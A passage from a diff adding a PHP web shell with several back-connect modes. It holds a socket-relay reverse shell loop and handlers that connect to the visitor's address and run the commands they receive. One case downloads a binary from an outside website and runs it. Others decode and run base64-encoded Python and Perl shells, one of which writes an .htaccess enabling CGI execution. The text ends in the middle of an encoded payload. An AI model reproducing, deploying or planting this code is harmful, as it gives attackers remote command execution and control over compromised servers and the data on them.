+� �// Check for end of TCP connection
+� �if (feof($sock)) {
+� � � printit("ERROR: Shell connection terminated");
+� � � break;
+� �}
+
+� �// Check for end of STDOUT
+� �if (feof($pipes[1])) {
+� � � printit("ERROR: Shell process terminated");
+� � � break;
+� �}
+
+� �// Wait until a command is end down $sock, or some
+� �// command output is available on STDOUT or STDERR
+� �$read_a = array($sock, $pipes[1], $pipes[2]);
+� �$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
+
+� �// If we can read from the TCP socket, send
+� �// data to process's STDIN
+� �if (in_array($sock, $read_a)) {
+� � � if ($debug) printit("SOCK READ");
+� � � $input = fread($sock, $chunk_size);
+� � � if ($debug) printit("SOCK: $input");
+� � � fwrite($pipes[0], $input);
+� �}
+
+� �// If we can read from the process's STDOUT
+� �// send data down tcp connection
+� �if (in_array($pipes[1], $read_a)) {
+� � � if ($debug) printit("STDOUT READ");
+� � � $input = fread($pipes[1], $chunk_size);
+� � � if ($debug) printit("STDOUT: $input");
+� � � fwrite($sock, $input);
+� �}
+
+� �// If we can read from the process's STDERR
+� �// send data down tcp connection
+� �if (in_array($pipes[2], $read_a)) {
+� � � if ($debug) printit("STDERR READ");
+� � � $input = fread($pipes[2], $chunk_size);
+� � � if ($debug) printit("STDERR: $input");
+� � � fwrite($sock, $input);
+� �}
+}
+
+fclose($sock);
+fclose($pipes[0]);
+fclose($pipes[1]);
+fclose($pipes[2]);
+proc_close($process);
+
+// Like print, but does nothing if we've daemonised ourself
+// (I can't figure out how to redirect STDOUT like a proper daemon)
+break;
+case "PHP_2":
+� � � � � $ipim=$_SERVER["REMOTE_ADDR"];
+� � � � �$portum="22";
+� � � � �if ($ipim <> "")
+� � � � �{
+� � � � �$mucx=fsockopen($ipim , $portum , $errno, $errstr );
+� � � � �if (!$mucx){
+� � � � � � � �$result = "Error: didnt connect !!!";
+� � � � �}
+� � � � �else {
+
+� � � � �$zamazing0="\n";
+� � � � �fputs ($mucx ,"\nwelcome ZoRBaCK\n\n");
+� � � � �fputs($mucx , system("uname -a") .$zamazing0 );
+� � � � �fputs($mucx , system("pwd") .$zamazing0 );
+� � � � �fputs($mucx , system("id") .$zamazing0.$zamazing0 );
+� � � � �while(!feof($mucx)){
+� � � � �fputs ($mucx);
+� � � � $one="[$";
+� � � � $two="]";
+� � � � $result= fgets ($mucx, 8192);
+� � � � $message=`$result`;
+� � � �fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n");
+� � � }
+� � � fclose ($mucx);
+� � � � �}
+� � � � �}
+
+break;
+case "PHP_3":
+� � � � �$fipn=$_SERVER["REMOTE_ADDR"];
+� � � � �$bportn="22";
+� � � � �if ($fipn <> "")
+� � � � �{
+� � � � �$fp=fsockopen($fipn , $bportn , $errno, $errstr);
+� � � � �if (!$fp){
+� � � � � � � �$result = "Error: could not open socket connection";
+� � � � �}
+� � � � �else {
+� � � � �fputs ($fp ,"\n
+whoami
+root
+:)\n\n");
+� � � while(!feof($fp)){
+� � � �fputs ($fp);
+� � � �$result= fgets ($fp, 4096);
+� � � $message=`$result`;
+� � � �fputs ($fp,"--> ".$message."\n");
+� � � }
+� � � fclose ($fp);
+� � � � �}
+� � � � �}
+break;
+case "PHP_4":
+#!/usr/bin/perl
+# �coded by izo
+{
+print "root by izo\n";
+$fip=$_SERVER["REMOTE_ADDR"];
+$bport="22";
+system("wget http://paradiseinpuntagorda.com/images/dc");
+system("chmod 777 dc");
+system("./dc $fip $bport");
+}
+break;
+case "PHP_5":
+# �coded by izo
+{
+print "Ba&#287;lan&#305;l&#305;yor...\n";
+$fipc=$_SERVER["REMOTE_ADDR"];
+$bportc="22";
+$izoemmi = 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCiMjIyMjIyMjIyMjIyMjIyMjIyMjIwojLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0rCiMgICAgICAgICAgICAgICAgICAg
+ICAgLl9fX19fX19fX19fX19fX19fX19fXy4gIHwKIyAgIGNvZGVkIGJ5IHNsYXYwbmljICB8IHNs
+YXYwbmljMEBnbWFpbC5jb20gfCAgfCAgICAKIyAgICAgICAgICAgICAgICAgICAgICBeLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tXiAgfAojIHNpdGU6IHNsYXYwbmljLnhzcy5ydSAgICAgICAgICAgICAg
+ICAgICAgICAgICB8CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLSsKI2ZvciBzZXR1cCBhIGxpc3RlbmluZyBwb3J0IG9uIHlvdXIgaG9zdDogbmMgLWwgLXAg
+W3BvcnRdIAojVXNlOiBweXRob24gc2xfYmMucHkgW2hvc3RdIFtwb3J0XSB8fCBzbF9iYy5weSAt
+ZGVmYXVsdCBzZXR0aW5ncwoKZnJvbSBzb2NrZXQgaW1wb3J0ICoKaW1wb3J0IG9zCmltcG9ydCBt
+ZDUKaW1wb3J0IHN5cwoKIyMjIyMjIyMjIyNfRGVmYXVsdF8jIyMjIyMjIyMjIyMjIyMjIyMjIyMj
+IyMKaG9zdD0nbG9jYWxob3N0JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAjCnBvcnQ9NjY2
+NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIwphdXRvY29tbWFuZHM9InVuc2V0
+IEhJU1RGSUxFO3VuYW1lIC1hO2lkIiAgICMKIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
+IyMjIyMjIyMjIyMjIyMKaWYgbGVuKHN5cy5hcmd2KT4xOgogICAgaG9zdD1zeXMuYXJndlsxXQog
+ICAgaWYgbGVuKHN5cy5hcmd2KT4yOgogICAgICAgIHBvcnQ9aW50KHN5cy5hcmd2WzJdKQpwcmlu
+dCAiWytdaG9zdDpwb3J0PSAlczolaSIlKGhvc3QscG9ydCkKICAgICAgICAKaW5mbz1vcy5wb3Bl
+bihhdXRvY29tbWFuZHMpLnJlYWQoKQp0cnk6CiAgICBzb2Nrb2JqPXNvY2tldChBRl9JTkVULFNP
+Q0tfU1RSRUFNKQogICAgc29ja29iai5jb25uZWN0KChob3N0LHBvcnQpKQpleGNlcHQ6CiAgICBw
+cmludCAnWy1dU29ja2V0RXJyb3InLHN5cy5leGNfdmFsdWUKICAgIHN5cy5leGl0KDEpCnNvY2tv
+Ymouc2VuZCgiLjpiaW5ic2hlbGw6LlxuICVzIiVpbmZvKQpvcy5kdXAyKHNvY2tvYmouZmlsZW5v
+KCksMikKb3MuZHVwMihzb2Nrb2JqLmZpbGVubygpLDEpCm9zLmR1cDIoc29ja29iai5maWxlbm8o
+KSwwKQpvcy5leGVjbCgiL2Jpbi9zaCIsInNoIik=';
+$file = fopen("conp" ,"w+");
+$write = fwrite ($file ,base64_decode($izoemmi));
+fclose($file);
+chmod("conp" , 0777);
+system("./conp $fipc $bportc");
+}
+break;
+case "PHP_6":
+� � mkdir('cgitelnet1', 0755);
+� � chdir('cgitelnet1');
+� � � � $kokdosya = ".htaccess";
+� � � � $dosya_adi = "$kokdosya";
+� � � � $dosya = fopen ($dosya_adi , 'w') or die ("Dosya
+a&#231;&#305;lamad&#305;!");
+� � � � $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
+
+AddType application/x-httpd-cgi .cin
+
+AddHandler cgi-script .cin
+AddHandler cgi-script .cin";
+� � � � fwrite ( $dosya , $metin ) ;
+� � � � fclose ($dosya);
+$cgishellizocin =
+'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLQ0KIyA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5w
+cml2OCBjZ2kgc2hlbGw8L2I+ICMgc2VydmVyDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiMt
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQ29uZmlndXJhdGlvbjogWW91IG5lZWQgdG8gY2hhbmdl
+IG9ubHkgJFBhc3N3b3JkIGFuZCAkV2luTlQuIFRoZSBvdGhlcg0KIyB2YWx1ZXMgc2hvdWxkIHdv
+cmsgZmluZSBmb3IgbW9zdCBzeXN0ZW1zLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KJFBhc3N3
+b3JkID0gInByaXY4IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhp
+cw0KCQkJCSMgdG8gbG9naW4uDQoNCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2Ug
+dGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZg0KCQkJCSMgeW91J3JlIHJ1bm5pbmcgdGhpcyBzY3Jp
+cHQgb24gYSBXaW5kb3dzIE5UDQoJCQkJIyBtYWNoaW5lLiBJZiB5b3UncmUgcnVubmluZyBpdCBv
+biBVbml4LCB5b3UNCgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuDQoNCiROVENt
+ZFNlcCA9ICImIjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1h
+bmRzDQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULg0KDQokVW5peENtZFNl
+cCA9ICI7IjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1hbmRz
+DQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4Lg0KDQokQ29tbWFuZFRpbWVvdXREdXJh
+dGlvbiA9IDEwOwkjIFRpbWUgaW4gc2Vjb25kcyBhZnRlciBjb21tYW5kcyB3aWxsIGJlIGtpbGxl
+ZA0KCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzDQoJ
+CQkJIyB1c2VmdWwgZm9yIGNvbW1hbmRzIHRoYXQgbWF5IGhhbmcgb3IgdGhhdA0KCQkJCSMgdGFr
+ZSB2ZXJ5IGxvbmcgdG8gZXhlY3V0ZSwgbGlrZSAiZmluZCAvIi4NCgkJCQkjIFRoaXMgaXMgdmFs
+aWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzDQoJCQkJIyBpZ25vcmVkIG9uIE5UIFNlcnZl
+cnMuDQoNCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRh
+IGlzIHNlbnQgdG8gdGhlDQoJCQkJIyBicm93c2VyIGFzIHNvb24gYXMgaXQgaXMgb3V0cHV0LCBv
+dGhlcndpc2UNCgkJCQkjIGl0IGlzIGJ1ZmZlcmVkIGFuZCBzZW5kIHdoZW4gdGhlIGNvbW1hbmQN
+CgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UNCgkJCQkj
+IHBpbmcsIHNvIHRoYXQgeW91IGNhbiBzZWUgdGhlIG91dHB1dCBhcyBpdA0KCQkJCSMgaXMgYmVp
+bmcgZ2VuZXJhdGVkLg0KDQojIERPTidUIENIQU5HRSBBTllUSElORyBCRUxPVyBUSElTIExJTkUg
+VU5MRVNTIFlPVSBLTk9XIFdIQVQgWU9VJ1JFIERPSU5HICEhDQoNCiRDbWRTZXAgPSAoJFdpbk5U
+ID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOw0KJENtZFB3ZCA9ICgkV2luTlQgPyAiY2QiIDog
+InB3ZCIpOw0KJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7DQokUmVkaXJlY3RvciA9
+ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOw0KDQojLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tDQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJz
+ZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQNCiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlw
+YXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4NCiMgVGhlIGZp
+bGVuYW1lIGlzIHN0b3JlZCBpbiAkaW57J2YnfSBhbmQgdGhlIGRhdGEgaXMgc3RvcmVkIGluICRp
+bnsnZmlsZWRhdGEnfS4NCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAk
+aW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YNCiMgdGhlIHZhcmlhYmxlLiBOb3Rl
+OiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBD
+R0kNCiMgc2NyaXB0cy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBSZWFkUGFyc2UgDQp7
+DQoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsNCglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwp
+Ow0KCQ0KCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0
+aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOw0KDQoJaWYoJEVOVnsnUkVRVUVTVF9N
+RVRIT0QnfSBlcSAiR0VUIikNCgl7DQoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KCX0N
+CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikNCgl7DQoJCWJpbm1vZGUo
+U1RESU4pIGlmICRNdWx0aXBhcnRGb3JtRGF0YSAmICRXaW5OVDsNCgkJcmVhZChTVERJTiwgJGlu
+LCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCgl9DQoNCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBk
+YXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBi
+b3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZl
+ciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhl
+YWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0K
+CQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMg
+dGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9
+ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9
+ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0K
+CQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJ
+CSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIv
+Ow0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxu
+fFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4
+KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRh
+cmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNw
+bGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGld
+ID1+IHMvXCsvIC9nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsN
+CgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMv
+JSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRl
+ZmluZWQoJGlueyRrZXl9KSk7DQoJCQkkaW57JGtleX0gLj0gJHZhbDsNCgkJfQ0KCX0NCn0NCg0K
+Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgUGFnZSBIZWFkZXINCiMg
+QXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldA0K
+Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUhlYWRlcg0Kew0KCSRFbmNvZGVk
+Q3VycmVudERpciA9ICRDdXJyZW50RGlyOw0KCSRFbmNvZGVkQ3VycmVudERpciA9fiBzLyhbXmEt
+ekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJcHJpbnQgIkNvbnRlbnQtdHlwZTog
+dGV4dC9odG1sXG5cbiI7DQoJcHJpbnQgPDxFTkQ7DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPnBy
+aXY4IGNnaSBzaGVsbDwvdGl0bGU+DQokSHRtbE1ldGFIZWFkZXINCg0KPG1ldGEgbmFtZT0ia2V5
+d29yZHMiIGNvbnRlbnQ9InByaXY4IGNnaSBzaGVsbCAgXyAgICAgaTVfQGhvdG1haWwuY29tIj4N
+CjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJwcml2OCBjZ2kgc2hlbGwgIF8gICAg
+aTVfQGhvdG1haWwuY29tIj4NCjwvaGVhZD4NCjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5m
+b2N1cygpIiBiZ2NvbG9yPSIjRkZGRkZGIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1h
+cmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiIHRleHQ9IiNGRjAwMDAiPg0KPHRhYmxlIGJv
+cmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+DQo8
+dHI+DQo8dGQgYmdjb2xvcj0iI0ZGRkZGRiIgYm9yZGVyY29sb3I9IiNGRkZGRkYiIGFsaWduPSJj
+ZW50ZXIiIHdpZHRoPSIxJSI+DQo8Yj48Zm9udCBzaXplPSIyIj4jPC9mb250PjwvYj48L3RkPg0K
+PHRkIGJnY29sb3I9IiNGRkZGRkYiIHdpZHRoPSI5OCUiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNp
+emU9IjIiPjxiPiANCjxiIHN0eWxlPSJjb2xvcjpibGFjaztiYWNrZ3JvdW5kLWNvbG9yOiNmZmZm
+NjYiPnByaXY4IGNnaSBzaGVsbDwvYj4gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9u
+dD48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjRkZGRkZGIj48
+Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4NCg0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9u
+P2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+VXBs
+b2FkIEZpbGU8L2ZvbnQ+PC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxv
+YWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPjxmb250IGNvbG9yPSIjRkYwMDAwIj5Eb3dubG9hZCBG
+aWxlPC9mb250PjwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij48Zm9u
+dCBjb2xvcj0iI0ZGMDAwMCI+RGlzY29ubmVjdDwvZm9udD48L2E+IHwNCjwvZm9udD48L3RkPg0K
+PC90cj4NCjwvdGFibGU+DQo8Zm9udCBzaXplPSIzIj4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tDQojIFByaW50cyB0aGUgTG9naW4gU2NyZWVuDQojLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tDQpzdWIgUHJpbnRMb2dpblNjcmVlbg0Kew0KCSRNZXNzYWdlID0gcSQ8L2ZvbnQ+PGgxPnBh
+c3M9cHJpdjg8L2gxPjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj48cHJlPjxpbWcgYm9y
+ZGVyPSIwIiBzcmM9Imh0dHA6Ly93d3cucHJpdjguaWJsb2dnZXIub3JnL3MucGhwPytjZ2l0ZWxu
+ZXQgc2hlbGwiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvcHJlPg0KJDsNCiMnDQoJcHJpbnQgPDxF
+TkQ7DQo8Y29kZT4NCg0KVHJ5aW5nICRTZXJ2ZXJOYW1lLi4uPGJyPg0KQ29ubmVjdGVkIHRvICRT
+ZXJ2ZXJOYW1lPGJyPg0KRXNjYXBlIGNoYXJhY3RlciBpcyBeXQ0KPGNvZGU+JE1lc3NhZ2UNCkVO
+RA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0
+IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+
+DQo8YnI+bG9naW46IGFkbWluPGJyPg0KcGFzc3dvcmQ6PGJyPg0KTG9naW4gaW5jb3JyZWN0PGJy
+Pjxicj4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50
+cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
+dWIgUHJpbnRMb2dpbkZvcm0NCnsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQo8Zm9ybSBuYW1l
+PSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCjxpbnB1dCB0eXBl
+PSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+DQo8L2ZvbnQ+DQo8Zm9udCBzaXplPSIz
+Ij4NCmxvZ2luOiA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2
+Ij5wcml2OCBjZ2kgc2hlbGw8L2I+PGJyPg0KcGFzc3dvcmQ6PC9mb250Pjxmb250IGNvbG9yPSIj
+MDA5OTAwIiBzaXplPSIzIj48aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InAiPg0KPGlucHV0
+IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0K
+DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRN
+TCBQYWdlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlRm9vdGVyDQp7DQoJ
+cHJpbnQgIjwvZm9udD48L2JvZHk+PC9odG1sPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0NCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNh
+biBiZSBhY2Nlc3NlcyB1c2luZyB0aGUNCiMgdmFyaWFibGUgJENvb2tpZXN7Jyd9DQojLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tDQpzdWIgR2V0Q29va2llcw0Kew0KCUBodHRwY29va2llcyA9IHNwbGl0
+KC87IC8sJEVOVnsnSFRUUF9DT09LSUUnfSk7DQoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2ll
+cykNCgl7DQoJCSgkaWQsICR2YWwpID0gc3BsaXQoLz0vLCAkY29va2llKTsNCgkJJENvb2tpZXN7
+JGlkfSA9ICR2YWw7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0
+aGUgc2NyZWVuIHdoZW4gdGhlIHVzZXIgbG9ncyBvdXQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
+CnN1YiBQcmludExvZ291dFNjcmVlbg0Kew0KCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3Nl
+ZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLQ0KIyBMb2dzIG91dCB0aGUgdXNlciBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGxvZ2lu
+IGFnYWluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ291dA0Kew0KCXBy
+aW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUN
